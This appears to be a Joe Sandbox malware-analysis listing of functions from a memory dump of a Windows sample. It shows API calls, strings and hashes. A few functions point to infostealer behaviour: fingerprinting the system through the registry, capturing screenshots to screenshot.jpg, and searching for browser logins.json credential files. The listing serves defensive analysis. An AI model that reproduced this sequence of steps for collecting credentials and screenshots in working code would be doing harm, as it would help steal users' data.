
Uniqueness Score: -1.00%

Function 00450016 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00450058
RegOpenKeyExA.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?,?,00000001), ref: 00450074
RegQueryValueExA.ADVAPI32(?,ProcessorNameString,00000000,00000000,?,?,?,00000001), ref: 00450093
RegCloseKey.ADVAPI32(?,?,00000001), ref: 0045009C
CharToOemA.USER32 ref: 004500AD

Strings

ProcessorNameString, xrefs: 0045008B
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 0045006A

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: CharCloseOpenQueryValue_memset
String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString
API String ID: 2235053359-2804670039
Opcode ID: db03ba76952bc03edaec298afe8992fe83899fbc02c7b5b6eb9facb65914ccfe
Instruction ID: 1248b9f85bec853651a01212b6784e9598ac376bbae484958a27c7fe7fe971ef
Opcode Fuzzy Hash: db03ba76952bc03edaec298afe8992fe83899fbc02c7b5b6eb9facb65914ccfe
Instruction Fuzzy Hash: 82112CB154024CAFEB309FA4DC85AEE7BACEB08348F50442AF919D7152EF746A488B55

Uniqueness

Uniqueness Score: -1.00%

Function 004503C0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00450402
RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?), ref: 0045041E
RegQueryValueExA.ADVAPI32(?,ProductName,00000000,00000000,?,?), ref: 0045043D
RegCloseKey.ADVAPI32(?), ref: 00450446
CharToOemA.USER32 ref: 00450457

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00450414
ProductName, xrefs: 00450435

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: CharCloseOpenQueryValue_memset
String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 2235053359-1787575317
Opcode ID: 0d054e10765d168649e3d2c3f44136aa7e9643b17ee016a7407d0545ad255997
Instruction ID: 19f36a76e9a1b13660545f680560004ad1aa510307883a1491e7b996cdabe338
Opcode Fuzzy Hash: 0d054e10765d168649e3d2c3f44136aa7e9643b17ee016a7407d0545ad255997
Instruction Fuzzy Hash: CA113DB154024CAFEB30DFA4DC85EEE7BACEB08348F50442AF919D7152EF745A488B55

Uniqueness

Uniqueness Score: -1.00%

Function 004507E4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004507EE
CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00450806
GetDeviceCaps.GDI32(00000000,00000008), ref: 0045081B
GetDeviceCaps.GDI32(?,0000000A), ref: 0045082B
ReleaseDC.USER32 ref: 00450836

Part of subcall function 00453394: __EH_prolog3_GS.LIBCMT ref: 0045339E

Part of subcall function 00401195: _memmove.LIBCMT ref: 004011B4

Strings

DISPLAY, xrefs: 004507FB

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: CapsDeviceH_prolog3_$CreateRelease_memmove
String ID: DISPLAY
API String ID: 3322158219-865373369
Opcode ID: 327312b3a8dffb2a712d2c9dcb957628b8b871c4dae012e5325b60fc6d8de619
Instruction ID: 4eb8f428a8d2041531941d41e89ee4666f6459015573dfad6009b98865f378a5
Opcode Fuzzy Hash: 327312b3a8dffb2a712d2c9dcb957628b8b871c4dae012e5325b60fc6d8de619
Instruction Fuzzy Hash: 6F2153B2800218AADB21EB66CC49FDFBE7CAF55714F00816AF54DB7191DE381A44CB74

Uniqueness

Uniqueness Score: -1.00%

Function 0045DC13 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 0045DC1A

Part of subcall function 0045EDC9: GetLastError.KERNEL32(?,00000001,0045E9B2,0045A1F4,?,?,00457E26,00000001,00000000,?,?,?,00457E84,004010F0), ref: 0045EDCD
Part of subcall function 0045EDC9: ___set_flsgetvalue.LIBCMT ref: 0045EDDB
Part of subcall function 0045EDC9: __calloc_crt.LIBCMT ref: 0045EDEF
Part of subcall function 0045EDC9: DecodePointer.KERNEL32(00000000,?,?,00457E26,00000001,00000000,?,?,?,00457E84,004010F0), ref: 0045EE09
Part of subcall function 0045EDC9: GetCurrentThreadId.KERNEL32 ref: 0045EE1F
Part of subcall function 0045EDC9: SetLastError.KERNEL32(00000000,?,?,00457E26,00000001,00000000,?,?,?,00457E84,004010F0), ref: 0045EE37

__calloc_crt.LIBCMT ref: 0045DC3C
__get_sys_err_msg.LIBCMT ref: 0045DC5A
_strcpy_s.LIBCMT ref: 0045DC62
__invoke_watson.LIBCMT ref: 0045DC77

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 0045DC27, 0045DC4A

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 3117964792-798102604
Opcode ID: fd682e17f6716c8202acc6d8a408eb9766d6fa2cc3e214051e038a850517cde6
Instruction ID: 18845910be4b603b96c37fc099550deb13d4cfe2888d0893138599e88be07136
Opcode Fuzzy Hash: fd682e17f6716c8202acc6d8a408eb9766d6fa2cc3e214051e038a850517cde6
Instruction Fuzzy Hash: 0EF028729083046BC73239165CC192B76AC8F4171BB10087FFE0597203D6ADAC0DC25E

Uniqueness

Uniqueness Score: -1.00%

Function 0045152C Relevance: 10.5, APIs: 7, Instructions: 46windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(00000000), ref: 00451536
GetDC.USER32(00000000), ref: 0045154C
CreateCompatibleBitmap.GDI32(00000000), ref: 0045154F
SelectObject.GDI32(?,00000000), ref: 0045155B
GetDC.USER32(00000000), ref: 0045156D
BitBlt.GDI32(?,00000000,00000000,?,?,00000000), ref: 0045157B

Part of subcall function 004514CE: GdipSaveImageToFile.GDIPLUS(?,screenshot.jpg,?,00000000), ref: 0045150B

DeleteObject.GDI32(00000000), ref: 00451591

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: CompatibleCreateObject$BitmapDeleteFileGdipImageSaveSelect
String ID:
API String ID: 927946569-0
Opcode ID: 56285e9dc56c0be290a9fdc2f96bd06e3afc220dcb9e8bfda8da619fc7b06bae
Instruction ID: b6eed482d74a1b37dde6d3a88f61a69cf3b054cabff8117f7b5070dcb4bb1692
Opcode Fuzzy Hash: 56285e9dc56c0be290a9fdc2f96bd06e3afc220dcb9e8bfda8da619fc7b06bae
Instruction Fuzzy Hash: 6A01D272400288FBCB026FA1EC49CBF3F79EB89750B000029FA09A2121D7368960AB65

Uniqueness

Uniqueness Score: -1.00%

Function 0045ED15 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00486B00,00000008,0045EE1D,00000000,00000000,?,?,00457E26,00000001,00000000,?,?,?,00457E84,004010F0), ref: 0045ED26
__lock.LIBCMT ref: 0045ED5A

Part of subcall function 00462C3F: __mtinitlocknum.LIBCMT ref: 00462C55
Part of subcall function 00462C3F: __amsg_exit.LIBCMT ref: 00462C61
Part of subcall function 00462C3F: EnterCriticalSection.KERNEL32(00000000,00000000,?,0045ED5F,0000000D), ref: 00462C69

InterlockedIncrement.KERNEL32(?), ref: 0045ED67
__lock.LIBCMT ref: 0045ED7B
___addlocaleref.LIBCMT ref: 0045ED99

Strings

KERNEL32.DLL, xrefs: 0045ED21

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: fa9fb582322051e97462ad434ceaf44b2f389840df9a9d2254ac616180fdb441
Instruction ID: ee4fe2b90d3f905df0529ea6e80d2f522d9568b84b4e7f60cde2e77c08851fe5
Opcode Fuzzy Hash: fa9fb582322051e97462ad434ceaf44b2f389840df9a9d2254ac616180fdb441
Instruction Fuzzy Hash: 7A016571440B00AFD760AF66D90974DBBF0AF50319F108D4FE8D5572A1CBB8A648CB1A

Uniqueness

Uniqueness Score: -1.00%

Function 0045DD0E Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0045DD2F

Part of subcall function 0045EE42: __getptd_noexit.LIBCMT ref: 0045EE45
Part of subcall function 0045EE42: __amsg_exit.LIBCMT ref: 0045EE52

__getptd.LIBCMT ref: 0045DD40
__getptd.LIBCMT ref: 0045DD4E

Strings

MOC, xrefs: 0045DD21
csm, xrefs: 0045DD28
RCC, xrefs: 0045DD1A

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$RCC$csm
API String ID: 803148776-2671469338
Opcode ID: 86a2ad961d7e147e204f0848311c30d3a4a1c17dd1617cae1ecc44f06bca62fa
Instruction ID: 46358b93c60017d3e9f627c69850bf5e03da07317f64013687801b61b33e2132
Opcode Fuzzy Hash: 86a2ad961d7e147e204f0848311c30d3a4a1c17dd1617cae1ecc44f06bca62fa
Instruction Fuzzy Hash: D2E0ED345101048EC7249766C08AB6933A5AF8831AF5D14A7EC0CCB323C77C999C994A

Uniqueness

Uniqueness Score: -1.00%

Function 00448A35 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 357COMMON

Download Yara Rule

APIs

Part of subcall function 0042133E: _memset.LIBCMT ref: 00421358

_memset.LIBCMT ref: 00448AA0

Strings

cannot open view: %s, xrefs: 00448B0A
cannot open %s column for writing, xrefs: 00448E24
no such column: "%s", xrefs: 00448E05
cannot open virtual table: %s, xrefs: 00448AE6

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: _memset
String ID: cannot open %s column for writing$cannot open view: %s$cannot open virtual table: %s$no such column: "%s"
API String ID: 2102423945-1973910841
Opcode ID: dafb7430d71cd9fdd5574d46bfb06daec5ca7e50d0df3bbc19d261a888c3fa38
Instruction ID: a39a199f569c6a148ff82fadb2fd0da2c4fbd074897aa157a243d6df86f817f6
Opcode Fuzzy Hash: dafb7430d71cd9fdd5574d46bfb06daec5ca7e50d0df3bbc19d261a888c3fa38
Instruction Fuzzy Hash: 41D170B1A00615EFEB20DF55C881AAEB7B1FF44314F14855EE905AB342DB78ED81CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00415D21 Relevance: 9.1, APIs: 6, Instructions: 61COMMON

Download Yara Rule

APIs

AreFileApisANSI.KERNEL32 ref: 00415D28
MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00415D46
_malloc.LIBCMT ref: 00415D50

Part of subcall function 0045A16B: __FF_MSGBANNER.LIBCMT ref: 0045A184
Part of subcall function 0045A16B: __NMSG_WRITE.LIBCMT ref: 0045A18B
Part of subcall function 0045A16B: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,00457E26,00000001,00000000,?,?,?,00457E84,004010F0), ref: 0045A1B0

MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00415D67
_free.LIBCMT ref: 00415D70

Part of subcall function 004596AA: HeapFree.KERNEL32(00000000,00000000,?,0045EE33,00000000,?,?,00457E26,00000001,00000000,?,?,?,00457E84,004010F0), ref: 004596C0
Part of subcall function 004596AA: GetLastError.KERNEL32(00000000,?,0045EE33,00000000,?,?,00457E26,00000001,00000000,?,?,?,00457E84,004010F0), ref: 004596D2

_free.LIBCMT ref: 00415D8E

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: ByteCharHeapMultiWide_free$AllocateApisErrorFileFreeLast_malloc
String ID:
API String ID: 2311203463-0
Opcode ID: 289249e8de06955ce38a15b8a4786cca602b87ac033b38c394133b91be090756
Instruction ID: 63fd679d5e6240005c20b9824829debc228b8fb4d5abb500098258d5a8c9aa8f
Opcode Fuzzy Hash: 289249e8de06955ce38a15b8a4786cca602b87ac033b38c394133b91be090756
Instruction Fuzzy Hash: B901D432508A21FB9B2156B9AC48DFF369DDFC57B47204227FC15E3280EA28CD8542AD

Uniqueness

Uniqueness Score: -1.00%

Function 0045DFD1 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 0045DFF9

Part of subcall function 00458A2C: __getptd.LIBCMT ref: 00458A3A
Part of subcall function 00458A2C: __getptd.LIBCMT ref: 00458A48

__getptd.LIBCMT ref: 0045E003

Part of subcall function 0045EE42: __getptd_noexit.LIBCMT ref: 0045EE45
Part of subcall function 0045EE42: __amsg_exit.LIBCMT ref: 0045EE52

__getptd.LIBCMT ref: 0045E011
__getptd.LIBCMT ref: 0045E01F
__getptd.LIBCMT ref: 0045E02A
_CallCatchBlock2.LIBCMT ref: 0045E050

Part of subcall function 00458AD1: __CallSettingFrame@12.LIBCMT ref: 00458B1D

Part of subcall function 0045E0F7: __getptd.LIBCMT ref: 0045E106
Part of subcall function 0045E0F7: __getptd.LIBCMT ref: 0045E114

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: c8442504b55a5534c4b1dea475616bde0f425508347af7bb132e81028d03cfe6
Instruction ID: c7cae79e2c62ffbdc7959ac1bf5bef18505c18a1839782b20c663e99cdd45d36
Opcode Fuzzy Hash: c8442504b55a5534c4b1dea475616bde0f425508347af7bb132e81028d03cfe6
Instruction Fuzzy Hash: 62110A71C10209DFDB04EFA5C446AEEB7B0FF08319F14846EF854A7252DB789A199F58

Uniqueness

Uniqueness Score: -1.00%

Function 004632F0 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004632FC

Part of subcall function 0045EE42: __getptd_noexit.LIBCMT ref: 0045EE45
Part of subcall function 0045EE42: __amsg_exit.LIBCMT ref: 0045EE52

__amsg_exit.LIBCMT ref: 0046331C
__lock.LIBCMT ref: 0046332C
InterlockedDecrement.KERNEL32(?), ref: 00463349
_free.LIBCMT ref: 0046335C
InterlockedIncrement.KERNEL32(02521600), ref: 00463374

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: d35ae2580b5462f5c80eaf8c12dce3f9f07b72c48a8dbbd2d471d2efe1e54d37
Instruction ID: 234347bc9a9e6a7a32b9dd3fc1fb0327d1197a09748caac81207c9bd6e3e4337
Opcode Fuzzy Hash: d35ae2580b5462f5c80eaf8c12dce3f9f07b72c48a8dbbd2d471d2efe1e54d37
Instruction Fuzzy Hash: 1001CB31A01621EBDB10AF6A980575E7360BF00716F04406BEC00A7392EF6CAE95CBCF

Uniqueness

Uniqueness Score: -1.00%

Function 004378DC Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00437A26
_memmove.LIBCMT ref: 00437A35
_memmove.LIBCMT ref: 00437A68
_memset.LIBCMT ref: 00437B44

Strings

-journal, xrefs: 00437A3A

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: _memmove$_memset
String ID: -journal
API String ID: 1357608183-1536856285
Opcode ID: 0646d1bf0f4a6a543cb134047d8197462855c65c1a86406753672abd2c03466b
Instruction ID: dc6d070b7a1b920708fa359582d608a6a3898bdc76da239845449115c7ca2f69
Opcode Fuzzy Hash: 0646d1bf0f4a6a543cb134047d8197462855c65c1a86406753672abd2c03466b
Instruction Fuzzy Hash: B5B192B1908606EFDB24CF69C88179EFBB0BF08314F14826EE469D7781D738A951CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00412674 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 236fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0045341F: MultiByteToWideChar.KERNEL32(00000000,00000000,00000104,?,00000000,00000000,000003E8,?,00000000,?,?,?,004096C0,00000104,00000104,?), ref: 0045344E
Part of subcall function 0045341F: MultiByteToWideChar.KERNEL32(00000000,00000000,00000104,?,00000000,?,?,00000000,?,?,?,004096C0,00000104,00000104,?,?), ref: 0045347D

FindNextFileW.KERNEL32(?,?), ref: 00412992
FindClose.KERNEL32(?), ref: 004129A6

Strings

\logins.json, xrefs: 004128AD
;, xrefs: 004128FD
\logins.json, xrefs: 004126FC

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: ByteCharFindMultiWide$CloseFileNext
String ID: ;$\logins.json$\logins.json
API String ID: 2000246954-507309815
Opcode ID: 438cfe108f9b50e3d6531f3e96fe5ff3bc751f36ff7989623d4f17314a47998f
Instruction ID: d77cf52f59b9f2d68e8a033457bcd9569da4302e755a44f0849b75bb3ff864d5
Opcode Fuzzy Hash: 438cfe108f9b50e3d6531f3e96fe5ff3bc751f36ff7989623d4f17314a47998f
Instruction Fuzzy Hash: DFA12EB180115CAEDB15EB90DD45FDEB77CAF15308F0040EAB609B6192EB745B88CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00424282 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 232COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00424382
_memmove.LIBCMT ref: 00424499

Strings

number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00424306
unknown column "%s" in foreign key definition, xrefs: 00424469
foreign key on %s should reference only one column of table %T, xrefs: 004242DE

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 4104443479-272990098
Opcode ID: 08766a5737e963078d260354e247a74d954954a14099aa6eee325f6ad03d018f
Instruction ID: 64b400ecff63a1368d75e0dfe2e950daa3e2f8e6faf4fb390b75c897a8d22e72
Opcode Fuzzy Hash: 08766a5737e963078d260354e247a74d954954a14099aa6eee325f6ad03d018f
Instruction Fuzzy Hash: 5FA15C75B00215DFCB14DF99D480A9EBBF1FF88304B55815AE809AB302D739E941CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00440E62 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 165COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00440F7C
_memmove.LIBCMT ref: 00440F94

Strings

string or blob too big, xrefs: 0044135B
statement aborts at %d: [%s] %s, xrefs: 00441386
out of memory, xrefs: 0044492C

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
API String ID: 4104443479-3170954634
Opcode ID: b05c4904484e439773eaa8881667150fe1d0121b1f7d574667134780954eba68
Instruction ID: 19af8f63f17c55ac04514185371a41ca0cd014ad4f74d049d40848df717f7a7b
Opcode Fuzzy Hash: b05c4904484e439773eaa8881667150fe1d0121b1f7d574667134780954eba68
Instruction Fuzzy Hash: 4061E471A00249DBEB10CFA5D881B9EBBB1BF54304F24401FE900AB752D778E996CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00424DC0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 161COMMON

Download Yara Rule

APIs

Part of subcall function 0042133E: _memset.LIBCMT ref: 00421358

_memmove.LIBCMT ref: 00424F35

Strings

unable to open shared library [%s], xrefs: 00424E40
no entry point [%s] in shared library [%s], xrefs: 00424E98
not authorized, xrefs: 00424DE6
error during initialization: %s, xrefs: 00424EDA

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: _memmove_memset
String ID: error during initialization: %s$no entry point [%s] in shared library [%s]$not authorized$unable to open shared library [%s]
API String ID: 3555123492-2940154166
Opcode ID: 8ec1749002a29ebb6d1cd74e127e75d088550cf764818e9a4cc458626e78466b
Instruction ID: 937c3dcc5e095a07d8e03f85a706611c5f1aa95ad9603a3ca50b0ab539b6d8e8
Opcode Fuzzy Hash: 8ec1749002a29ebb6d1cd74e127e75d088550cf764818e9a4cc458626e78466b
Instruction Fuzzy Hash: 3041E331600216BFEB215FA5EC41BAF77A8FF88314F51802BF905D5240EB7C9A119BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00407DF0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 118COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00407E30
_memmove.LIBCMT ref: 00407EF3
std::_Xinvalid_argument.LIBCPMT ref: 00407F13

Strings

invalid string position, xrefs: 00407F0E
string too long, xrefs: 00407E2B

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 2168136238-4289949731
Opcode ID: 6db31dafba15292e06fd917d8d12ebae90f43d2d2cd0cbce1524eede31be290b
Instruction ID: bfd83764b0164850e5c1c72a73fb424f99359d89837cfac81fd1924392fad5c5
Opcode Fuzzy Hash: 6db31dafba15292e06fd917d8d12ebae90f43d2d2cd0cbce1524eede31be290b
